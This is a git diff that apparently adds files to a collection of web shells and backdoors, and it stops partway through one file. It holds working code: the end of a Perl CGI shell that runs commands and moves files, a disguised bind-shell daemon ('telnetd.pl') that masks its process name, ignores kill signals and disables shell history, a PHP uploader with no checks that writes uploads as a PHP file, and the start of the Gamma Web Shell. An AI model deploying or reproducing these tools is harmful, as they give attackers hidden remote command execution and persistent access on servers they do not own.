+			while(<CommandOutput>)
+			{
+				$_ =~ s/(\n|\r\n)$//;
+				print "$_\n";
+			}
+			$|=0;
+		}
+		else # show output after command completes
+		{
+			print `$Command`;
+		}
+		if(!$WinNT)
+		{
+			alarm(0);
+		}
+		print "</xmp>";
+	}
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function displays the page that contains a link which allows the user
+# to download the specified file. The page also contains a auto-refresh
+# feature that starts the download automatically.
+# Argument 1: Fully qualified filename of the file to be downloaded
+#------------------------------------------------------------------------------
+sub PrintDownloadLinkPage
+{
+	local($FileUrl) = @_;
+	if(-e $FileUrl) # if the file exists
+	{
+		# encode the file link so we can send it to the browser
+		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
+		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
+		&PrintPageHeader("c");
+		print <<END;
+<code>
+Sending File $TransferFile...<br>
+If the download does not start automatically,
+<a href="$DownloadLink">Click Here</a>.
+</code>
+END
+		&PrintCommandLineInputForm;
+		&PrintPageFooter;
+	}
+	else # file doesn't exist
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $FileUrl: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function reads the specified file from the disk and sends it to the
+# browser, so that it can be downloaded by the user.
+# Argument 1: Fully qualified pathname of the file to be sent.
+#------------------------------------------------------------------------------
+sub SendFileToBrowser
+{
+	local($SendFile) = @_;
+	if(open(SENDFILE, $SendFile)) # file opened for reading
+	{
+		if($WinNT)
+		{
+			binmode(SENDFILE);
+			binmode(STDOUT);
+		}
+		$FileSize = (stat($SendFile))[7];
+		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
+		print "Content-Type: application/x-unknown\n";
+		print "Content-Length: $FileSize\n";
+		print "Content-Disposition: attachment; filename=$1\n\n";
+		print while(<SENDFILE>);
+		close(SENDFILE);
+	}
+	else # failed to open file
+	{
+		&PrintPageHeader("f");
+		print "<code>Failed to download $SendFile: $!</code>";
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+	}
+}
+
+
+#------------------------------------------------------------------------------
+# This function is called when the user downloads a file. It displays a message
+# to the user and provides a link through which the file can be downloaded.
+# This function is also called when the user clicks on that link. In this case,
+# the file is read and sent to the browser.
+#------------------------------------------------------------------------------
+sub BeginDownload
+{
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to upload a file. If the
+# file is not specified, it displays a form allowing the user to specify a
+# file, otherwise it starts the upload process.
+#------------------------------------------------------------------------------
+sub UploadFile
+{
+	# if no file is specified, print the upload form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileUploadForm;
+		&PrintPageFooter;
+		return;
+	}
+	&PrintPageHeader("c");
+
+	# start the uploading process
+	print "<code>Uploading $TransferFile to $CurrentDir...<br>";
+
+	# get the fullly qualified pathname of the file to be created
+	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
+	$TransferFile =~ m!([^/^\\]*)$!;
+	$TargetName .= $PathSep.$1;
+
+	$TargetFileSize = length($in{'filedata'});
+	# if the file exists and we are not supposed to overwrite it
+	if(-e $TargetName && $Options ne "overwrite")
+	{
+		print "Failed: Destination file already exists.<br>";
+	}
+	else # file is not present
+	{
+		if(open(UPLOADFILE, ">$TargetName"))
+		{
+			binmode(UPLOADFILE) if $WinNT;
+			print UPLOADFILE $in{'filedata'};
+			close(UPLOADFILE);
+			print "Transfered $TargetFileSize Bytes.<br>";
+			print "File Path: $TargetName<br>";
+		}
+		else
+		{
+			print "Failed: $!<br>";
+		}
+	}
+	print "</code>";
+	&PrintCommandLineInputForm;
+	&PrintPageFooter;
+}
+
+#------------------------------------------------------------------------------
+# This function is called when the user wants to download a file. If the
+# filename is not specified, it displays a form allowing the user to specify a
+# file, otherwise it displays a message to the user and provides a link
+# through  which the file can be downloaded.
+#------------------------------------------------------------------------------
+sub DownloadFile
+{
+	# if no file is specified, print the download form again
+	if($TransferFile eq "")
+	{
+		&PrintPageHeader("f");
+		&PrintFileDownloadForm;
+		&PrintPageFooter;
+		return;
+	}
+	
+	# get fully qualified path of the file to be downloaded
+	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
+		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
+	{
+		$TargetFile = $TransferFile;
+	}
+	else # path is relative
+	{
+		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
+		$TargetFile .= $PathSep.$TransferFile;
+	}
+
+	if($Options eq "go") # we have to send the file
+	{
+		&SendFileToBrowser($TargetFile);
+	}
+	else # we have to send only the link page
+	{
+		&PrintDownloadLinkPage($TargetFile);
+	}
+}
+
+#------------------------------------------------------------------------------
+# Main Program - Execution Starts Here
+#------------------------------------------------------------------------------
+&ReadParse;
+&GetCookies;
+
+$ScriptLocation = $ENV{'SCRIPT_NAME'};
+$ServerName = $ENV{'SERVER_NAME'};
+$LoginPassword = $in{'p'};
+$RunCommand = $in{'c'};
+$TransferFile = $in{'f'};
+$Options = $in{'o'};
+
+$Action = $in{'a'};
+$Action = "login" if($Action eq ""); # no action specified, use default
+
+# get the directory in which the commands will be executed
+$CurrentDir = $in{'d'};
+chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
+
+$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
+
+if($Action eq "login" || !$LoggedIn) # user needs/has to login
+{
+	&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+	&ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+	&UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+	&DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+	&PerformLogout;
+}
diff --git a/138shell/T/telnetd.pl.txt b/138shell/T/telnetd.pl.txt
new file mode 100644
index 0000000..aa1d004
--- /dev/null
+++ b/138shell/T/telnetd.pl.txt
@@ -0,0 +1,462 @@
+#!/usr/bin/perl
+# Telnet-like Standard Daemon 0.7
+#
+#    0ldW0lf - oldwolf@atrixteam.net
+#            - old-wolf@zipmai.com
+#            - www.atrix.cjb.net
+#            - www.atrixteam.net
+#
+#  For those guys that still like to open ports
+#  and use non-rooted boxes
+#
+#  This has been developed to join in the TocToc
+#  project code, now it's done and I'm distributing
+#  this separated
+#
+#  This one i made without IO::Pty so it uses
+#  only standard modules... enjoy it
+#
+#  tested on linux boxes.. probably will work fine on others
+#  any problem... #atrix@irc.brasnet.org
+#
+
+##########################################################
+# ******************* CONFIGURATION ******************** #
+##########################################################
+my $PORT        = $ARGV[0] || 3847;        # default port is 3847
+my $PASS        = '';         # encripted password
+my $SHELL       = "/bin/bash";             # shell to be executed
+my $HOME        = "/tmp";                  # your HOME
+my $PROC        = "inetd";                 # name of the process
+my $PASS_PROMPT = "Password: ";            # password prompt
+my $WRONG_PASS  = "Wrong password!";       # "wrong password" message
+my @STTY        = ('sane', 'dec');         # stty arguments
+##########################################################
+
+# feel free to change the ENV
+#### ENVironment ####
+$ENV{HOME}       = $HOME;
+#$ENV{PS1}        = '[\u@\h \W]: '; # the way i like :)
+                 # colorful PS1 is also funny :)
+$ENV{PS1}        = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
+$ENV{MAIL}       = '/var/mail/root';
+$ENV{PATH}       = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
+$ENV{HISTFILE}   = '/dev/null';
+$ENV{USER}       = 'root';
+$ENV{LOGNAME}    = 'root';
+$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
+$ENV{LS_COLORS}  = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
+$ENV{SHELL}      = $SHELL;
+$ENV{TERM}       = 'xterm';
+#####################
+
+$0=$PROC."\0";
+
+use IO::Socket;
+use IO::Select;
+use POSIX;
+use strict;
+
+# i wouldn't change that
+# if i were you
+###### SIGnals ######
+$SIG{HUP}  = 'IGNORE';
+$SIG{PS}   = 'IGNORE';
+$SIG{TERM} = 'IGNORE';
+$SIG{CHLD} = sub { wait; };
+#####################
+
+
+# ioctl stuff
+my %IOCTLDEF;
+$IOCTLDEF{TIOCSWINSZ} = 0x5414;
+$IOCTLDEF{TIOCNOTTY}  = 0x5422;
+$IOCTLDEF{TIOCSCTTY}  = 0x540E;
+safeload('sys/ttycom.ph', 1); # BSD
+safeload('sys/ioctl.ph', 1);
+safeload('asm/ioctls.ph', 1);
+
+foreach my $IOCTL (keys(%IOCTLDEF)) {
+  next if (defined(&{$IOCTL}));
+
+  if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
+    while(<IOD>) {
+      if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
+        eval "sub $IOCTL () {$1;}";
+        last;
+      }
+    }
+    close(IOD);
+  }
+
+  # i realy dunno if i can do that.. but.. here it goes
+  eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
+}
+
+
+# starting...
+$PORT = $ARGV[0] if ($ARGV[0]);
+chdir('/');
+
+no strict 'refs';
+my $bindfd = *{'bind_sock'};
+*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
+my $bind = \*{$bindfd};
+
+my $pid = fork();
+die "ERROR: I could not fork() the process." unless defined($pid);
+exit if $pid;
+
+
+my %CLIENT;
+my $sel_serv = IO::Select->new($bind);
+my $sel_shell = IO::Select->new();
+
+
+# main loop...
+while ( 1 ) {
+  select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
+
+  read_clients();
+  read_shells();
+}
+
+sub read_clients {
+  map { read_client($_) } ($sel_serv->can_read(0.01));
+}
+
+sub read_client {
+  my $fh = shift;
+
+  if ($fh eq $bind) {
+    my $newcon = $bind->accept;
+    $sel_serv->add($newcon);
+    $CLIENT{$newcon}->{senha} = 0;
+    $CLIENT{$newcon}->{sock} = $newcon;
+    $fh->autoflush(1);
+    do_client($newcon, '3', '5', '1');
+    sleep(1);
+    write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
+  } else {
+      my $msg;
+      my $nread = sysread($fh, $msg, 1024);
+
+      if ($nread == 0) {
+        close_client($fh);
+      } else {
+         telnet_parse($fh, $msg);
+      }
+  }
+}
+
+sub read_shells {
+  map { read_shell($_) } ($sel_shell->can_read(0.01));
+}
+
+sub telnet_parse {
+  my ($cli, $msg) = @_;
+  my $char = (split('', $msg))[0];
+
+  if (ord($char) == 255) {
+     chr_parse($cli, $msg);
+  } else {
+     if ($CLIENT{$cli}->{senha} == 0) {
+       $CLIENT{$cli}->{buf} .= $msg;
+
+       return() unless ($msg =~ /\r|\n/);
+
+       my $pass = $CLIENT{$cli}->{buf};
+       $CLIENT{$cli}->{buf} = '';
+
+       $pass =~ s/\n//g;
+       $pass =~ s/\0//g;
+       $pass =~ s/\r//g;
+
+       if (crypt($pass, $PASS) ne $PASS) {
+         finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
+       } else {
+          $CLIENT{$cli}->{senha} = 1;
+          write_client($cli, chr(255).chr(253).chr(31));
+          write_client($cli, "\r\n\r\r\n\r");
+          new_shell($cli);
+       }
+       return();
+     }
+
+     $msg =~ s/\r\n\0\0//g;
+     $msg =~ s/\0//g;
+     $msg =~ s/\r\n/\n/g;
+     write_shell($cli, $msg);
+  }
+}
+
+sub read_shell {
+  my $shell = shift;
+  my $cli;
+  map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
+
+  my $msg;
+  my $nread = sysread($shell, $msg, 1024);
+ 
+  if ($nread == 0) {
+    finish_client($cli, "Terminal closed.\r\n\r");
+  } else {
+     write_client($cli, $msg);
+  }
+}
+
+sub to_chr {
+  my $chrs = '';
+  map { $chrs .= chr($_) }  (split(/ +/, shift));
+  return($chrs);
+}
+
+sub do_client {
+  my ($client, @codes) = @_;
+  map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
+}
+
+
+sub chr_parse { 
+  my ($client, $chrs) = @_;
+
+  my $ords = '';
+  map { $ords .= ord($_).' ' } (split(//, $chrs));
+  my $msg = '';
+
+
+  if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
+     my $winsize = pack('C4', $4, $3, $2, $1);
+     ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
+  }
+
+  foreach my $code (split("255 ", $ords)) {
+    if ($code =~ /(\d+) (.*)$/) {
+      my $codes = $2;
+      if ($1 == 251) {
+        # do whatever you want dude ehehe
+        $msg .= chr(255).chr(253);
+
+        map { $msg .= chr($_) } (split(/ +/, $codes));
+      }
+    }
+  }
+
+  write_client($client, $msg) if ($msg);
+  return(1);
+}
+
+sub new_shell {
+  my $cli = shift;
+
+  POSIX::setpgid(0, 0);
+
+  my ($tty, $pty);
+
+  unless (($tty, $pty) = open_tty($cli)) {
+    finish_client($cli, "ERROR: No more pty?s avaliable\n");
+    return(undef);
+  }
+
+  my $pid = fork();
+  if (not defined($pid)) {
+    finish_client($cli, "ERROR: fork()\n");
+    return(undef);
+  }
+
+  unless($pid) {
+    close($pty);
+
+    local(*DEVTTY);
+
+    if (open (DEVTTY, "/dev/tty")) {
+      ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
+      close(DEVTTY);
+    }
+
+    POSIX::setsid();
+    ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
+
+    open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
+    open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
+    open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
+    close($tty);
+
+    sleep(1);
+
+    foreach my $stty ("/bin/stty", "/usr/bin/stty") {
+      next unless (-x $stty);
+      map { system("$stty", $_) } @STTY;
+    }
+
+    chdir("$HOME");
+    { exec("$SHELL") };
+
+    syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
+    syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
+    syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
+
+    while (my $msg = <STDIN>) {
+      $msg =~ s/\n$//;
+      $msg =~ s/\r$//;
+
+      if ($msg =~ /^\s*cd\s+(\S+)/) {
+        my $notf = "directory $1 not found!\n";
+        chdir($1) || syswrite(STDOUT, $notf, length($notf));
+      } else {
+         system("$msg 2>&1");
+      }
+      syswrite(STDOUT, "I'm FuCKeD!# ");
+    }
+
+    exit;
+  }
+  close($tty);
+
+  select($pty); $| = 1;
+  select(STDOUT);
+
+  set_raw($pty);
+
+  $CLIENT{$cli}->{shell} = $pty;
+  $sel_shell->add($pty);
+
+  return(1);
+}
+
+
+
+# Funciton set_raw() stolen from IO::Pty
+sub set_raw($) {
+  my $self = shift;
+  return 1 if not POSIX::isatty($self);
+  my $ttyno = fileno($self);
+  my $termios = new POSIX::Termios;
+  unless ($termios) {
+#    warn "set_raw: new POSIX::Termios failed: $!";
+    return undef;
+  }
+  unless ($termios->getattr($ttyno)) {
+#    warn "set_raw: getattr($ttyno) failed: $!";
+    return undef;
+  }
+  $termios->setiflag(0);
+  $termios->setoflag(0);
+  $termios->setlflag(0);
+  $termios->setcc(&POSIX::VMIN, 1);
+  $termios->setcc(&POSIX::VTIME, 0);
+  unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
+#    warn "set_raw: setattr($ttyno) failed: $!";
+    return undef;
+  }
+  return 1;
+}
+
+sub open_tty {
+  no strict;
+  my $cli = shift;
+  my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
+
+  
+  for (my $i = 0; $i < 256; $i++) {
+     my $pty = get_tty($i, "/dev/pty");
+     next unless (open($PTY, "+> $pty"));
+
+     my $tty = get_tty($i, "/dev/tty");
+
+     unless(open($TTY, "+> $tty")) {
+       close($PTY);
+       next;
+     }
+
+     return($TTY, $PTY);
+
+  }
+
+  return();
+}
+
+sub get_tty {
+  my ($num, $base) = @_;
+
+  my @series = ('p' .. 'z', 'a' .. 'e');
+  my @subs = ('0' .. '9', 'a' .. 'f');
+
+  my $buf = $base;
+  $buf .= @series[($num >> 4) & 0xF];
+  $buf .= @subs[$num & 0xF];
+
+  return($buf);
+}
+
+sub safeload {
+  my ($module, $require, $arg) = @_;
+  my $file = $module;
+  $file =~ s/::/\//g;
+
+  if ($require) {
+    # all found gonna be loaded
+    map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
+  } else {
+      $file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
+      return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
+  }
+
+  return();
+}
+
+sub write_shell {
+  my ($cli, $msg) = @_;
+  my $shell = $CLIENT{$cli}->{shell};
+
+  return(undef) unless ($shell);
+
+  foreach my $m (split_chars($msg, 20)) {
+    read_shells();
+    print $shell $m;
+    read_shells();
+  }
+  return(1);
+}
+
+sub split_chars {
+  my ($msg, $nchars) = @_;
+
+  my @splited;
+  my @chrs = split ('', $msg);
+  my $done = 0;
+  while ( 1 ) {
+    my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
+    $done += $nchars;
+    last if (length($splited) < 1);
+    push(@splited, $splited);
+  }
+  return(@splited);
+}
+
+sub finish_client {
+  my ($cli, $msg) = @_;
+  write_client($cli, $msg);
+  close_client($cli);
+}
+   
+sub close_client {
+  my $cli = shift;
+  my $sock = $CLIENT{$cli}->{sock};
+
+  $sel_serv->remove($sock);
+  if ($CLIENT{$cli}->{shell}) {
+    my $shell = $CLIENT{$cli}->{shell};
+    $sel_shell->remove($shell);
+    close($shell);
+  }
+  $sock->close() if($sock);
+  delete($CLIENT{$cli});
+}
+
+sub write_client {
+   my ($cli, $msg) = @_;
+   my $sock = $CLIENT{$cli}->{sock};
+   syswrite($sock, $msg, length($msg)) if ($sock);
+}
+ 
diff --git a/138shell/U/Uploader.php.txt b/138shell/U/Uploader.php.txt
new file mode 100644
index 0000000..f2f2179
--- /dev/null
+++ b/138shell/U/Uploader.php.txt
@@ -0,0 +1,9 @@
+<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
+<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
+Send this file: <INPUT NAME="userfile" TYPE="file">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<?
+move_uploaded_file($userfile, "entrika.php"); 
+?>
+
diff --git a/138shell/W/WebShell.cgi.txt b/138shell/W/WebShell.cgi.txt
new file mode 100644
index 0000000..11adf5a
--- /dev/null
+++ b/138shell/W/WebShell.cgi.txt
@@ -0,0 +1,869 @@
+#!/usr/bin/perl
+###############################################################################
+### Gamma Web Shell
+### Copyright 2003 Gamma Group
+### All rights reserved
+###
+### Gamma Web Shell is free for both commercial and non commercial
+### use. You may modify this script as you find necessary as long
+### as you do not sell it. Redistribution is not allowed without
+### prior consent from Gamma Group (support@gammacenter.com).
+### 
+### Gamma Group <http://www.gammacenter.com>
+###
+
+use strict;
+
+###############################################################################
+
+package WebShell::Configuration;
+
+use vars qw($password $restricted_mode $ok_commands);
+
+##
+## Password.
+## Set to blank if you don't need password protection.
+##
+$password = "changeme";
+
+##
+## Restricted mode.
+## Set to "1" to allow only a limited set of commands.
+##
+$restricted_mode = 0;
+
+##
+## Available commands.
+## The list of available commands for the restricted mode.
+##
+$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
+
+###############################################################################
+
+package WebShell::Templates;
+
+use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
+
+my $VERSION = 'Gamma Web Shell 1.3';
+
+my $STYLESHEET = <<EOT;
+body {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 90%;
+  color: #000;
+  background: #FFF;
+  margin: 0px;
+  padding: 0px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 0.3em;
+  padding: 0px;
+}
+
+input, select, textarea, select {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 100%;
+  margin: 1px;
+  padding: 0px 1px;
+}
+
+pre, code, tt {
+  font-family: 'Courier New', Courier, monospace;
+  font-size: 100%;
+}
+
+form {
+  margin: 0px;
+  padding: 0px;
+}
+
+table {
+  font-size: 100%;
+}
+
+a {
+  text-decoration: none;
+  color: #000;
+  background: transparent;
+}
+
+a:hover {
+  text-decoration: underline;
+}
+
+.header, .footer {
+  color: #000;
+  background: #CCF;
+  margin: 0px;
+  padding: 0px;
+  text-align: center;
+  border: solid #000;
+  border-width: 1px 0px;
+}
+
+.box {
+  border: 1px solid #000;
+  border-collapse: collapse;
+  color: #000;
+  background: #CCF;
+}
+
+.box-header, .box-content, .box-text, .box-error, .box-menu {
+  border: 1px solid #000;
+}
+
+.box-header, .box-header a {
+  color: #FFF;
+  background: #000;
+}
+
+.box-content {
+  text-align: center;
+}
+
+.box-text {
+  padding: 3px 10px;
+  font-size: 90%;
+}
+
+.box-menu {
+  padding: 3px 10px;
+}
+
+.box-error {
+  color: #FFF;
+  background: #F00;
+  font-weight: bold;
+  padding: 3px 25px;
+  text-align: center;
+}
+
+.dialog {
+  text-align: left;
+  border-collapse: collapse;
+}
+
+.dialog-even {
+  color: #000;
+  background: #CCF;
+}
+
+.dialog-odd {
+  color: #000;
+  background: #AAE;
+}
+
+.menu {
+  font-weight: normal;
+}
+
+.menu-selected {
+  font-weight: bold;
+}
+
+.tool {
+  background: transparent;
+  color: #000;
+  border-style: hidden;
+  border-width: 1px;
+  text-decoration: none;
+}
+
+.tool:hover {
+  border-style: outset;
+  text-decoration: none;
+}
+
+.output {
+  color: #FFF;
+  background: #000;
+  padding: 1em;
+  font-weight: bold;
+}
+
+.output-text {
+}
+
+.output-command {
+  color: #FF7;
+  background: #000;
+}
+
+.output-error {
+  color: #FFF;
+  background: #F00;
+}
+
+.entries {
+  border: 1px solid #777;
+  border-collapse: collapse;
+}
+
+.entries td, .entries th {
+  padding: 2px 10px;
+}
+
+.entries th, .entries td {
+  border: 1px solid #777;
+}
+
+.entries-even {
+    color: #FFF;
+    background: #444;
+}
+
+.entry-dir a {
+  color: #BBF;
+  background: transparent;
+}
+
+.entry-exec {
+  color: #BFB;
+  background: transparent;
+}
+
+.entry-file {
+}
+
+.entry-mine {
+}
+
+.entry-alien {
+  color: #FBB;
+  background: transparent;
+}
+
+EOT
+
+$LOGIN_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <form action="WebShell.cgi" method="POST">
+                        <table class="box">
+                            <tr><th class="box-header">Login</th></tr>
+                            [% if error %]
+                                <tr><td class="box-error">Invalid password!</td></tr>
+                            [% end %]
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <td>Password:</td>
+                                            <td><input name="password" type="password"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                            <tr>
+                                <td class="box-content">
+                                    <input class="tool" type="submit" value="OK">
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$INPUT_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
+                    <br><br>
+                    <script type="text/javascript">
+                        function submit_execute() {
+                            var entry = document.forms.execute.elements['command'];
+                            if (entry.value.length > 0) {
+                                entry.select();
+                                entry.focus();
+                                document.forms.execute.elements['action'].value = 'execute';
+                                return true;
+                            }
+                            else {
+                                return false;
+                            }
+                        }
+                        function submit_browse() {
+                            document.forms.execute.elements['action'].value = 'browse';
+                        }
+                    </script>
+                    <form name="execute" action="WebShell.cgi" method="POST" target="output">
+                        <input name="action" type="hidden" value="execute">
+                        <table class="box">
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <th>Command:</th>
+                                            <td><input name="command" type="text" size="50"></td>
+                                            <td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
+                                            <td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$EXECUTE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if old_line %]
+            <pre class="output-command">[% old_line as html %]</pre>
+        [% end %]
+        [% if output %]
+            <pre class="output-text">[% output as html %]</pre>
+        [% end %]
+        [% if error %]
+            <pre class="output-error">[% error as html %]</pre>
+        [% end %]
+        [% if new_line %]
+            <pre class="output-command">[% new_line as html %]</pre>
+        [% end %]
+    </body>
+</html>
+EOT
+
+$BROWSE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if error %]
+            <p class="output-error">[% error as html %]</p>
+        [% end %]
+        <table class="entries" width="100%">
+            <tr class="entries-even" align="left">
+                <th colspan="6">
+                    [% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
+                </th>
+            </tr>
+            <tr class="entries-odd" align="left">
+                <th width="100%"><small>Name</small></th>
+                <th><small>Size</small></th>
+                <th><small>Time</small></th>
+                <th><small>Owner</small></th>
+                <th><small>Group</small></th>
+                <th><small>Mode</small></th>
+            </tr>
+            [% for entry in entries %]
+                <tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
+                    <td width="100%">
+                        [% if entry.type_file %]
+                            [% if entry.type_exec %]
+                                <code class="entry-exec">[% entry.name as html %]</code>
+                            [% else %]
+                                <code class="entry-file">[% entry.name as html %]</code>
+                            [% end %]
+                        [% elif entry.type_dir %]
+                            <code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
+                        [% else %]
+                            <code class="entry-other">[% entry.name as html %]</code>
+                        [% end %]
+                    </td>
+                    <td align="right">
+                        [% if entry.type_file %]
+                            <code class="entry-text">[% entry.size as html %]</code></td>
+                        [% else %]
+                        &nbsp;
+                        [% end %]
+                    </td>
+                    <td><code class="entry-text">[% entry.time as nbsp %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
+                    <td><code class="entry-text">[% entry.mode as html %]</code></td>
+                </tr>
+            [% end %]
+        </table>
+    </body>
+</html>
+EOT
+
+
+###############################################################################
+
+package WebShell::MiniXIT;
+
+sub new {
+    my ($class) = @_;
+    return bless {}, $class;
+}
+
+sub substitute {
+    my ($self, $input, %keywords) = @_;
+    my $statements = $self->parse($input);
+    my $operation = $self->compile($statements);
+    my $output = $self->evaluate($operation, \%keywords);
+    return $output;
+}
+
+sub parse {
